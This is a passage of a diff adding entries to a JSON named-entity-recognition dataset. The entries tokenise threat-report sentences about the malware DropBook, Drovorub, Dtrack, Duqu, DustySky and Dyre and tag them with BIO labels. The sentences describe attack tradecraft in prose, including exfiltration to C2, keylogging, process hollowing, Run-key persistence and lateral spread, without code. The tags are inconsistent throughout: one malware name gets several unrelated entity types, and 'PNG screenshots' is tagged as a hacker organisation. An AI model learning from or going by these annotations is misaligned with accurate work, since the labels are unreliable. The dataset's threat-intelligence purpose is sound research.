"Arabic", + "language", + "in", + "the", + "infected", + "machine's", + "settings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DropBook", + "can", + "communicate", + "with", + "its", + "operators", + "by", + "exploiting", + "the", + "Simplenote,", + "DropBox,", + "and", + "the", + "social", + "media", + "platform,", + "Facebook,", + "where", + "it", + "can", + "create", + "fake", + "accounts", + "to", + "control", + "the", + "backdoor", + "and", + "receive", + "instructions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "B-Org", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "DropBook", + "can", + "execute", + "arbitrary", + "shell", + "commands", + "on", + "the", + "victims'", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "can", + "transfer", + "files", + "from", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "has", + "de-obsfuscated", + "XOR", + "encrypted", + "payloads", + "in", + "WebSocket", + "messages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "can", + "exfiltrate", + "files", + "over", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "can", + "delete", + "specific", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "can", + "download", + "files", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "can", + "use", + "a", + "port", + "forwarding", + "rule", + "on", + "its", + "agent", + "module", + "to", + "relay", + "network", + "traffic", + "through", + "the", + "client", + "module", + "to", + "a", + "remote", + "host", + "on", + "the", + "same", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "can", + "use", + "kernel", + "modules", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "can", + "use", + "TCP", + "to", + "communicate", + "between", + "its", + "agent", + "and", + "client", + "modules." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "has", + "used", + "XOR", + "encrypted", + "payloads", + "in", + "WebSocket", + "client", + "to", + "server", + "messages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "has", + "used", + "a", + "kernel", + "module", + "rootkit", + "to", + "hide", + "processes,", + "files,", + "executables,", + "and", + "network", + "artifacts", + "from", + "user", + "space", + "view." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "can", + "execute", + "arbitrary", + "commands", + "as", + "root", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Drovorub", + "can", + "use", + "the", + "WebSocket", + "protocol", + "and", + "has", + "initiated", + "communication", + "with", + "C2", + "servers", + "with", + "an", + "HTTP", + "Upgrade", + "request." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "packs", + "collected", + "data", + "into", + "a", + "password", + "protected", + "archive." + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack’s", + "RAT", + "makes", + "a", + "persistent", + "target", + "file", + "with", + "auto", + "execution", + "on", + "the", + "host", + "start." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "retrieve", + "browser", + "history." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "collect", + "a", + "variety", + "of", + "information", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "has", + "used", + "a", + "decryption", + "routine", + "that", + "is", + "part", + "of", + "an", + "executable", + "physical", + "patch." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "has", + "used", + "a", + "dropper", + "that", + "embeds", + "an", + "encrypted", + "payload", + "as", + "extra", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "remove", + "its", + "persistence", + "and", + "delete", + "itself." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "list", + "files", + "on", + "available", + "disk", + "volumes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "of", + "Dtrack", + "can", + "replace", + "the", + "normal", + "flow", + "of", + "a", + "program", + "execution", + "with", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack’s", + "can", + "download", + "and", + "upload", + "a", + "file", + "to", + "the", + "victim’s", + "computer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack’s", + "dropper", + "contains", + "a", + "keylogging", + "executable." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "save", + "collected", + "data", + "to", + "disk,", + "different", + "file", + "formats,", + "and", + "network", + "shares." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "One", + "of", + "Dtrack", + "can", + "hide", + "in", + "replicas", + "of", + "legitimate", + "programs", + "like", + "OllyDbg,", + "7-Zip,", + "and", + "FileZilla." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Dtrack’s", + "dropper", + "can", + "list", + "all", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "has", + "used", + "process", + "hollowing", + "shellcode", + "to", + "target", + "a", + "predefined", + "list", + "of", + "processes", + "from", + "<code>%SYSTEM32%</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "collect", + "the", + "RegisteredOwner,", + "RegisteredOrganization,", + "and", + "InstallDate", + "registry", + "values." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "contains", + "a", + "function", + "that", + "calls", + "<code>LoadLibrary</code>", + "and", + "<code>GetProcAddress</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "collect", + "the", + "victim's", + "computer", + "name,", + "hostname", + "and", + "adapter", + "information", + "to", + "create", + "a", + "unique", + "identifier." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "collect", + "the", + "host's", + "IP", + "addresses", + "using", + "the", + "<code>ipconfig</code>", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "collect", + "network", + "and", + "active", + "connection", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "used", + "hard-coded", + "credentials", + "to", + "gain", + "access", + "to", + "a", + "network", + "share." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "has", + "used", + "<code>cmd.exe</code>", + "to", + "add", + "a", + "persistent", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dtrack", + "can", + "add", + "a", + "service", + "called", + "WBService", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Duqu", + "examines", + "running", + "system", + "processes", + "for", + "tokens", + "that", + "have", + "specific", + "system", + "privileges.", + "If", + "it", + "finds", + "one,", + "it", + "will", + "copy", + "the", + "token", + "and", + "store", + "it", + "for", + "later", + "use.", + "Eventually", + "it", + "will", + "start", + "new", + "processes", + "with", + "the", + "stored", + "token", + "attached.", + "It", + "can", + "also", + "steal", + "tokens", + "to", + "acquire", + "administrative", + "privileges." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Duqu", + "uses", + "a", + "custom", + "command", + "and", + "control", + "protocol", + "that", + "communicates", + "over", + "commonly", + "used", + "ports,", + "and", + "is", + "frequently", + "encapsulated", + "by", + "application", + "layer", + "protocols." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "discovery", + "modules", + "used", + "with", + "Duqu", + "can", + "collect", + "information", + "on", + "open", + "windows." + ], + "ner_tags": [ + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Modules", + "can", + "be", + "pushed", + "to", + "and", + "executed", + "by", + "Duqu", + "that", + "copy", + "data", + "to", + "a", + "staging", + "area,", + "compress", + "it,", + "and", + "XOR", + "encrypt", + "it." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Duqu", + "will", + "inject", + "itself", + "into", + "different", + "processes", + "to", + "evade", + "detection.", + "The", + "selection", + "of", + "the", + "target", + "process", + "is", + "influenced", + "by", + "the", + "security", + "software", + "that", + "is", + "installed", + "on", + "the", + "system", + "(Duqu", + "will", + "inject", + "into", + "different", + "processes", + "depending", + "on", + "which", + "security", + "suite", + "is", + "installed", + "on", + "the", + "infected", + "host)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Duqu", + "can", + "be", + "configured", + "to", + "have", + "commands", + "relayed", + "over", + "a", + "peer-to-peer", + "network", + "of", + "infected", + "hosts", + "if", + "some", + "of", + "the", + "hosts", + "do", + "not", + "have", + "Internet", + "access." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Duqu", + "can", + "track", + "key", + "presses", + "with", + "a", + "keylogger", + "module." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "discovery", + "modules", + "used", + "with", + "Duqu", + "can", + "collect", + "information", + "on", + "accounts", + "and", + "permissions." + ], + "ner_tags": [ + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Modules", + "can", + "be", + "pushed", + "to", + "and", + "executed", + "by", + "Duqu", + "that", + "copy", + "data", + "to", + "a", + "staging", + "area,", + "compress", + "it,", + "and", + "XOR", + "encrypt", + "it." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Duqu", + "has", + "used", + "<code>msiexec</code>", + "to", + "execute", + "malicious", + "Windows", + "Installer", + "packages.", + "Additionally,", + "a", + "PROPERTY=VALUE", + "pair", + "containing", + "a", + "56-bit", + "encryption", + "key", + "has", + "been", + "used", + "to", + "decrypt", + "the", + "main", + "payload", + "from", + "the", + "installer", + "packages." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "discovery", + "modules", + "used", + "with", + "Duqu", + "can", + "collect", + "information", + "on", + "process", + "details." + ], + "ner_tags": [ + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Duqu", + "is", + "capable", + "of", + "loading", + "executable", + "code", + "via", + "process", + "hollowing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Duqu", + "uses", + "a", + "custom", + "command", + "and", + "control", + "protocol", + "that", + "communicates", + "over", + "commonly", + "used", + "ports,", + "and", + "is", + "frequently", + "encapsulated", + "by", + "application", + "layer", + "protocols." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversaries", + "can", + "instruct", + "Duqu", + "to", + "spread", + "laterally", + "by", + "copying", + "itself", + "to", + "shares", + "it", + "has", + "enumerated", + "and", + "for", + "which", + "it", + "has", + "obtained", + "legitimate", + "credentials", + "(via", + "keylogging", + "or", + "other", + "means).", + "The", + "remote", + "host", + "is", + "then", + "infected", + "by", + "using", + "the", + "compromised", + "credentials", + "to", + "schedule", + "a", + "task", + "on", + "remote", + "machines", + "that", + "executes", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversaries", + "can", + "instruct", + "Duqu", + "to", + "spread", + "laterally", + "by", + "copying", + "itself", + "to", + "shares", + "it", + "has", + "enumerated", + "and", + "for", + "which", + "it", + "has", + "obtained", + "legitimate", + "credentials", + "(via", + "keylogging", + "or", + "other", + "means).", + "The", + "remote", + "host", + "is", + "then", + "infected", + "by", + "using", + "the", + "compromised", + "credentials", + "to", + "schedule", + "a", + "task", + "on", + "remote", + "machines", + "that", + "executes", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "the", + "Duqu", + "command", + "and", + "control", + "is", + "operating", + "over", + "HTTP", + "or", + "HTTPS,", + "Duqu", + "uploads", + "data", + "to", + "its", + "controller", + "by", + "appending", + "it", + "to", + "a", + "blank", + "JPG", + "file." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Duqu", + "command", + "and", + "control", + "protocol's", + "data", + "stream", + "can", + "be", + "encrypted", + "with", + "AES-CBC." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "reconnaissance", + "modules", + "used", + "with", + "Duqu", + "can", + "collect", + "information", + "on", + "network", + "configuration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "discovery", + "modules", + "used", + "with", + "Duqu", + "can", + "collect", + "information", + "on", + "network", + "connections." + ], + "ner_tags": [ + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversaries", + "can", + "instruct", + "Duqu", + "to", + "spread", + "laterally", + "by", + "copying", + "itself", + "to", + "shares", + "it", + "has", + "enumerated", + "and", + "for", + "which", + "it", + "has", + "obtained", + "legitimate", + "credentials", + "(via", + "keylogging", + "or", + "other", + "means).", + "The", + "remote", + "host", + "is", + "then", + "infected", + "by", + "using", + "the", + "compromised", + "credentials", + "to", + "schedule", + "a", + "task", + "on", + "remote", + "machines", + "that", + "executes", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Duqu", + "creates", + "a", + "new", + "service", + "that", + "loads", + "a", + "malicious", + "driver", + "when", + "the", + "system", + "starts.", + "When", + "Duqu", + "is", + "active,", + "the", + "operating", + "system", + "believes", + "that", + "the", + "driver", + "is", + "legitimate,", + "as", + "it", + "has", + "been", + "signed", + "with", + "a", + "valid", + "private", + "key." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "can", + "compress", + "files", + "via", + "RAR", + "while", + "staging", + "data", + "to", + "be", + "exfiltrated." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "has", + "exfiltrated", + "data", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "has", + "two", + "hard-coded", + "domains", + "for", + "C2", + "servers;", + "if", + "the", + "first", + "does", + "not", + "respond,", + "it", + "will", + "try", + "the", + "second." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "can", + "delete", + "files", + "it", + "creates", + "from", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "scans", + "the", + "victim", + "for", + "files", + "that", + "contain", + "certain", + "keywords", + "and", + "document", + "types", + "including", + "PDF,", + "DOC,", + "DOCX,", + "XLS,", + "and", + "XLSX,", + "from", + "a", + "list", + "that", + "is", + "obtained", + "from", + "the", + "C2", + "as", + "a", + "text", + "file.", + "It", + "can", + "also", + "identify", + "logical", + "drives", + "for", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "contains", + "a", + "keylogger." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DustySky", + "searches", + "for", + "network", + "drives", + "and", + "removable", + "media", + "and", + "duplicates", + "itself", + "onto", + "them." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "created", + "folders", + "in", + "temp", + "directories", + "to", + "host", + "collected", + "files", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "DustySky", + "dropper", + "uses", + "a", + "function", + "to", + "obfuscate", + "the", + "name", + "of", + "functions", + "and", + "other", + "parts", + "of", + "the", + "malware." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "can", + "detect", + "connected", + "USB", + "devices." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "collects", + "information", + "about", + "running", + "processes", + "from", + "victims." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "achieves", + "persistence", + "by", + "creating", + "a", + "Registry", + "entry", + "in", + "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DustySky", + "searches", + "for", + "removable", + "media", + "and", + "duplicates", + "itself", + "onto", + "it." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "captures", + "PNG", + "screenshots", + "of", + "the", + "main", + "screen." + ], + "ner_tags": [ + "B-Way", + "O", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "checks", + "for", + "the", + "existence", + "of", + "anti-virus." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "lists", + "all", + "installed", + "software", + "for", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "extracts", + "basic", + "information", + "about", + "the", + "operating", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DustySky", + "has", + "used", + "both", + "HTTP", + "and", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "DustySky", + "dropper", + "uses", + "Windows", + "Management", + "Instrumentation", + "to", + "extract", + "information", + "about", + "the", + "operating", + "system", + "and", + "whether", + "an", + "anti-virus", + "is", + "active." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "decrypts", + "resources", + "needed", + "for", + "targeting", + "the", + "victim." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "injects", + "into", + "other", + "processes", + "to", + "load", + "modules." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "the", + "ability", + "to", + "send", + "information", + "staged", + "on", + "a", + "compromised", + "host", + "externally", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "a", + "command", + "to", + "download", + "and", + "executes", + "additional", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "the", + "ability", + "to", + "create", + "files", + "in", + "a", + "TEMP", + "folder", + "to", + "act", + "as", + "a", + "database", + "to", + "store", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "the", + "ability", + "to", + "directly", + "inject", + "its", + "code", + "into", + "the", + "web", + "browser", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "the", + "ability", + 